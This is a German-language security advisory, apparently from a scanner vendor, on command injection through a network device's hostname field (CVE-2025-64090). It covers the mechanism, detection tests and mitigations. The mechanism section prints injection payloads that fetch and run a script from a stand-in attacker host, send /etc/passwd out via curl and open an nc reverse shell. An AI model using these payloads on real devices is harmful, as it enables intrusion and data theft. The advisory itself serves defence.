CVE-2025-64090: Command Injection via Device Hostname Field Enables Full System Compromise
Authentifizierte Angreifer können beliebige OS-Befehle ausführen, indem sie Shell-Metazeichen in das Geräte-Hostname-Feld injizieren. CVSS 10.0. Eine häufige Schwachstellenklasse in Netzwerkgeräten und Embedded-Systemen, die durchgängig kritischen Impact liefert.
| Feld | Detail |
|---|---|
| CVE-ID | CVE-2025-64090 |
| Schweregrad | KRITISCH (CVSS 3.1: 10.0) |
| Schwachstellentyp | OS-Command-Injection (CWE-78) |
| Veröffentlicht | 9. Januar 2026 |
| Authentifizierung erforderlich | Ja (niedrige Rechte) |
| Angriffsvektor | Netzwerk |
Was ist CVE-2025-64090?
CVE-2025-64090 ist eine Command-Injection-Schwachstelle, bei der das Konfigurationsfeld für den Geräte-Hostname unbereinigt an einen zugrunde liegenden Shell-Befehl übergeben wird. Durch das Einfügen von Shell-Metazeichen (;, |, `, $()) in den Hostname-Wert können authentifizierte Angreifer aus dem beabsichtigten Befehlskontext ausbrechen und beliebige OS-Befehle mit den Rechten des Management-Prozesses des Geräts ausführen — typischerweise Root.
Diese Schwachstellenklasse ist in Netzwerkgeräten, IoT-Hardware, Routern, Firewalls und Embedded-Linux-Systemen endemisch, wo webbasierte Management-Interfaces Shell-Befehle aus benutzerseitig gelieferten Konfigurationswerten ohne ordnungsgemäße Bereinigung zusammensetzen.
⚠ Niedrige Hürde zur vollständigen Kompromittierung
Jeder authentifizierte Benutzer — einschließlich Konten mit niedrigen Rechten — kann Befehlsausführung auf Root-Ebene erreichen. In Umgebungen, in denen Standard- oder schwache Credentials existieren, wird dies faktisch zu unauthentifizierter Ausnutzung.
Mechanik der Command-Injection
# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)
# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`
# Subshell:
$(id > /var/www/html/pwned.txt)
# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh
Betroffene Versionen
Konsultieren Sie das Hersteller-Advisory für konkrete Hardware-Modelle und Firmware-Versionen. Netzwerkgeräte mit webbasierten Management-Interfaces, die die Hostname-Konfiguration exponieren, sind die primäre Risikofläche.
Erkennungsmethoden
Test auf Hostname-Injection
# Manual test: submit hostname with command injection payload # Use time-delay to confirm blind injection POST /admin/network/hostname hostname=test%3Bsleep%205 # If response delays ~5 seconds: vulnerable # Out-of-band confirmation: hostname=test%3Bnslookup+attacker.burpcollaborator.net
🔍 KENSAI-Erkennung: Der Geräte-Security-Scanner von KENSAI testet Management-Interface-Felder einschließlich Hostname-, DNS-, NTP- und SNMP-Konfiguration auf OS-Command-Injection. CVE-2025-64090-Muster sind in den Assessment-Profilen für Netzwerkgeräte enthalten.
Mitigations-Schritte
- Hersteller-Firmware-Update sofort anwenden.
- Eingabevalidierung: Hostname-Felder sollten nur alphanumerische Zeichen und Bindestriche akzeptieren (RFC-952/1123-konform).
- Sichere APIs nutzen: Ersetzen Sie die Konstruktion von Shell-Befehlen durch System-Calls, die Argument-Arrays akzeptieren (keine Shell-Interpolation).
- Management-Interface beschränken: Begrenzen Sie den Zugriff auf die Management-UI per Firewall-Regeln auf vertrauenswürdige IP-Bereiche.
- Standard-Credentials ändern: Stellen Sie sicher, dass alle Management-Konten starke, eindeutige Passwörter verwenden.
- Netzwerk-Segmentierung: Isolieren Sie Management-Interfaces von benutzerzugänglichen Netzen.
Command-Injection in Ihren Netzwerkgeräten?
KENSAI scannt Netzwerkgeräte und Management-Interfaces auf Command-Injection-Schwachstellen einschließlich CVE-2025-64090. Identifizieren Sie verwundbare Geräte, bevor Angreifer Fuß fassen.
Netzwerkgeräte kostenlos scannenVeröffentlicht vom KENSAI Security Research Team · Weitere CVE-Analysen